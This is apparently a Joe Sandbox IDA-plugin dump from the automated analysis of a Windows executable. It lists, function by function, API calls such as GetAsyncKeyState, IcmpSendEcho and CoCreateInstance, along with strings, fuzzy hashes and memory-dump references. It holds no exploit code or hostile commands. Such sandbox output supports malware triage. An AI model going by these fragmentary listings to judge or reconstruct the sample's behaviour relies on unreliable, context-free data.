                                                                                                                • Opcode ID: e07f69ed850f54e6c44a6baf7b372647ef6a023b463ebaf8425076dc520b8499
                                                                                                                • Instruction ID: caa94cc9b7e30a48c61e03979dfedd24d2e66667f34d2e231d61710e37f72fea
                                                                                                                • Opcode Fuzzy Hash: e07f69ed850f54e6c44a6baf7b372647ef6a023b463ebaf8425076dc520b8499
                                                                                                                • Instruction Fuzzy Hash: 3E41E9B690412CABDB21EB54CC55EDE73BCEB48314F1441A7B519A2051EA71EBD8CFB0
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(00DDDBF0,00DDDBF0,00DDDBF0), ref: 00D8E062
                                                                                                                • GetDriveTypeW.KERNEL32(?,00DF3AE4,00000061), ref: 00D8E12C
                                                                                                                • _wcscpy.LIBCMT ref: 00D8E156
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                • API String ID: 2820617543-1000479233
                                                                                                                • Opcode ID: 9906823be7c3846cc9ead81fae25e7cd042750b3a2cae3027151ecdc2dcea711
                                                                                                                • Instruction ID: fca8128e10887f825f5c242f5bdf975829b904d4a35ebaf6cf23427e814ec40b
                                                                                                                • Opcode Fuzzy Hash: 9906823be7c3846cc9ead81fae25e7cd042750b3a2cae3027151ecdc2dcea711
                                                                                                                • Instruction Fuzzy Hash: E551BF35148300AFC714EF14C891A6EB7A6EF84354F188D2DF9958B2A2DB71DE09CB72
                                                                                                                APIs
                                                                                                                • __swprintf.LIBCMT ref: 00D484E5
                                                                                                                • __itow.LIBCMT ref: 00D48519
                                                                                                                  • Part of subcall function 00D62177: _xtow@16.LIBCMT ref: 00D62198
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                • API String ID: 1502193981-2263619337
                                                                                                                • Opcode ID: ac4a4abfe10557a497b5f45cfdda41f0e4183816ffef2a5fb86de802b9a4c366
                                                                                                                • Instruction ID: 809b120218bfcc94691c2f6cd4ec33cae45e6d3a94ccbdadda60b0d08aa9902d
                                                                                                                • Opcode Fuzzy Hash: ac4a4abfe10557a497b5f45cfdda41f0e4183816ffef2a5fb86de802b9a4c366
                                                                                                                • Instruction Fuzzy Hash: B241D271904605EBDB24DF38E841BBA77E5EB48310F24446AE58AD7295EA31DA41DB30
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00DAA067
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00DAA06E
                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DAA081
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00DAA089
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DAA094
                                                                                                                • DeleteDC.GDI32(00000000), ref: 00DAA09D
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00DAA0A7
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00DAA0BB
                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00DAA0C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                • Opcode ID: f50ccb95ece89971e73a6e23570d27e32bdf4bd704e33215b6c009bb4cf84013
                                                                                                                • Instruction ID: 2d124c57af4121121d6937f31d5aa0e990a4e0fd879febb05df7766b9dab78ec
                                                                                                                • Opcode Fuzzy Hash: f50ccb95ece89971e73a6e23570d27e32bdf4bd704e33215b6c009bb4cf84013
                                                                                                                • Instruction Fuzzy Hash: 90317A3110021AABDF219F68DC09FDA3B6AFF0A365F150325FA15D61A0C7359820DBB5
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D65CCA
                                                                                                                  • Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E
                                                                                                                • __gmtime64_s.LIBCMT ref: 00D65D63
                                                                                                                • __gmtime64_s.LIBCMT ref: 00D65D99
                                                                                                                • __gmtime64_s.LIBCMT ref: 00D65DB6
                                                                                                                • __allrem.LIBCMT ref: 00D65E0C
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D65E28
                                                                                                                • __allrem.LIBCMT ref: 00D65E3F
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D65E5D
                                                                                                                • __allrem.LIBCMT ref: 00D65E74
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D65E92
                                                                                                                • __invoke_watson.LIBCMT ref: 00D65F03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 384356119-0
                                                                                                                • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                • Instruction ID: 10891d92f7a7e1937036b3687441a4afbe5c2fc85c9e9c78c63cb6ced83cd181
                                                                                                                • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                • Instruction Fuzzy Hash: E171CA71A01F16ABDB149F78DD41B6A73A8EF10724F14823AF514D7686F771DA808BB0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D85816
                                                                                                                • GetMenuItemInfoW.USER32(00E018F0,000000FF,00000000,00000030), ref: 00D85877
                                                                                                                • SetMenuItemInfoW.USER32(00E018F0,00000004,00000000,00000030), ref: 00D858AD
                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00D858BF
                                                                                                                • GetMenuItemCount.USER32(?), ref: 00D85903
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00D8591F
                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00D85949
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00D8598E
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D859D4
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D859E8
                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D85A09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4176008265-0
                                                                                                                • Opcode ID: 81f18e3a8af543ebc2dcf2279991fa9fc1cb290e4c2e3a60843afc7f27a2056b
                                                                                                                • Instruction ID: 747b51a5af9165e16208006e01af88d37374d214284681cb8432ace3fefc2b99
                                                                                                                • Opcode Fuzzy Hash: 81f18e3a8af543ebc2dcf2279991fa9fc1cb290e4c2e3a60843afc7f27a2056b
                                                                                                                • Instruction Fuzzy Hash: A9619D7091064AEFDB11EFA4EC88EBE7BB9EB05358F180159E882E7255D731AD45CB30
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DA9AA5
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DA9AA8
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00DA9ACC
                                                                                                                • _memset.LIBCMT ref: 00DA9ADD
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DA9AEF
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DA9B67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 830647256-0
                                                                                                                • Opcode ID: e7901a0b5067ec20363a61d6f48b9b5c20d0c9ee3eca67c413a680e4138ab00d
                                                                                                                • Instruction ID: a05d31e980dd4edc80e3e68794346617266746884b6dac0f4db0c7f1254ffd83
                                                                                                                • Opcode Fuzzy Hash: e7901a0b5067ec20363a61d6f48b9b5c20d0c9ee3eca67c413a680e4138ab00d
                                                                                                                • Instruction Fuzzy Hash: D3616B75900208AFDB14DFA4CC91EEEB7B8EF0A710F144199FA15EB291D770AA45DB60
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00D83591
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00D83612
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00D8362D
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00D83647
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00D8365C
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00D83674
                                                                                                                • GetKeyState.USER32(00000011), ref: 00D83686
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00D8369E
                                                                                                                • GetKeyState.USER32(00000012), ref: 00D836B0
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00D836C8
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00D836DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 46d912078697774934df835908c608b35d3df9646091ea98412d6383452339b7
                                                                                                                • Instruction ID: 3fb31ebb93d76c8470d66aa5fb0b5ae7248a3f324728a11160ed2eee4c587e45
                                                                                                                • Opcode Fuzzy Hash: 46d912078697774934df835908c608b35d3df9646091ea98412d6383452339b7
                                                                                                                • Instruction Fuzzy Hash: 7941C8605047CA7DFF31A76889167B5BEA1AB12B44F0C409DD5CA463C2FBA49BC8C772
                                                                                                                APIs
                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00D7A2AA
                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00D7A2F5
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00D7A307
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D7A327
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00D7A36A
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D7A37E
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D7A393
                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00D7A3A0
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D7A3A9
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D7A3BB
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D7A3C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706829360-0
                                                                                                                • Opcode ID: 939de871005f1ee3f67816d13171d796c6e1caeb9018bdc0741936b5a9f746c5
                                                                                                                • Instruction ID: f0bb4a9ccffd4b3779a03c9126a4e4ff601ef80471a11c947221f3eef3da1689
                                                                                                                • Opcode Fuzzy Hash: 939de871005f1ee3f67816d13171d796c6e1caeb9018bdc0741936b5a9f746c5
                                                                                                                • Instruction Fuzzy Hash: 30412B3190021AAFCB05DFE8DC84DEEBBB9EF48344F008065E545E3261EB30AA45CBB1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                • CoInitialize.OLE32 ref: 00D9B298
                                                                                                                • CoUninitialize.OLE32 ref: 00D9B2A3
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00DCD8FC,?), ref: 00D9B303
                                                                                                                • IIDFromString.OLE32(?,?), ref: 00D9B376
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00D9B410
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D9B471
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                • API String ID: 834269672-1287834457
                                                                                                                • Opcode ID: 79764bceedd57b34548c19b6de6bf2e7df27f3fd7086c6230994bb87576022d0
                                                                                                                • Instruction ID: 88ea68e5401a23a733701fb4d392c755c1e371699fc4cb1744b7864b4016e7ac
                                                                                                                • Opcode Fuzzy Hash: 79764bceedd57b34548c19b6de6bf2e7df27f3fd7086c6230994bb87576022d0
                                                                                                                • Instruction Fuzzy Hash: 2E617A70208302AFDB10DF54D985B6EB7E8EF89724F05491AF9859B291D770ED48CBB2
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00D986F5
                                                                                                                • inet_addr.WSOCK32(?,?,?), ref: 00D9873A
                                                                                                                • gethostbyname.WSOCK32(?), ref: 00D98746
                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00D98754
                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D987C4
                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D987DA
                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00D9884F
                                                                                                                • WSACleanup.WSOCK32 ref: 00D98855
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                • Opcode ID: 89ebb15aa9a70cdd8b34cd92db2b7a9c0639a751a76d61bba7ccba481dd9fc65
                                                                                                                • Instruction ID: 1655f7a393a0519b06cb97476d3015755e02229bb88d74fb186f283f334b8fc8
                                                                                                                • Opcode Fuzzy Hash: 89ebb15aa9a70cdd8b34cd92db2b7a9c0639a751a76d61bba7ccba481dd9fc65
                                                                                                                • Instruction Fuzzy Hash: 5C5181316043019FDB10AF64DC45B2ABBE5EF49B20F14892AF996DB2A1DB34E804DB71
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00DA9C68
                                                                                                                • CreateMenu.USER32 ref: 00DA9C83
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00DA9C92
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA9D1F
                                                                                                                • IsMenu.USER32(?), ref: 00DA9D35
                                                                                                                • CreatePopupMenu.USER32 ref: 00DA9D3F
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DA9D70
                                                                                                                • DrawMenuBar.USER32 ref: 00DA9D7E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 176399719-4108050209
                                                                                                                • Opcode ID: 89c97441e362d641b8e91c54001c4d57303e60ba2274f58846f859252ce7ee03
                                                                                                                • Instruction ID: 49752ffee3799acc97ed815dec6bc59be72f307b687ece7019daaa8dd985aace
                                                                                                                • Opcode Fuzzy Hash: 89c97441e362d641b8e91c54001c4d57303e60ba2274f58846f859252ce7ee03
                                                                                                                • Instruction Fuzzy Hash: FF414579A0020AAFDF10EF68D894F9ABBB6FF4A314F184068E945A7351D731A954CF70
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00D8EC1E
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00D8EC94
                                                                                                                • GetLastError.KERNEL32 ref: 00D8EC9E
                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00D8ED0B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                • Opcode ID: 2ccf4de67bd26c81a3f332d892d61f3fe4eb7449a9fa84594703477066354073
                                                                                                                • Instruction ID: 754888cf83e68a63166fe6061ef205c10e1f7c81c732c8934f46d896a1c0c917
                                                                                                                • Opcode Fuzzy Hash: 2ccf4de67bd26c81a3f332d892d61f3fe4eb7449a9fa84594703477066354073
                                                                                                                • Instruction Fuzzy Hash: AE318D35A0020AAFC710FF69DD49EAEBBB4EB44700F198026F506E7291DA71DA45CBB1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D7C782
                                                                                                                • GetDlgCtrlID.USER32 ref: 00D7C78D
                                                                                                                • GetParent.USER32 ref: 00D7C7A9
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D7C7AC
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00D7C7B5
                                                                                                                • GetParent.USER32(?), ref: 00D7C7D1
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D7C7D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 313823418-1403004172
                                                                                                                • Opcode ID: 04c5859678f65c499b32c5e3daa6fd0e5f52e7b3f64ecd55eedeb432a98110eb
                                                                                                                • Instruction ID: b739e1323d8f18562cfddc73641390ff205e06d1acbd6727614abbcfaae8fc92
                                                                                                                • Opcode Fuzzy Hash: 04c5859678f65c499b32c5e3daa6fd0e5f52e7b3f64ecd55eedeb432a98110eb
                                                                                                                • Instruction Fuzzy Hash: 5721A174A40209AFDF09EBA4CC85EBEB775EB45310F148119F566D32D1EB78981AEB30
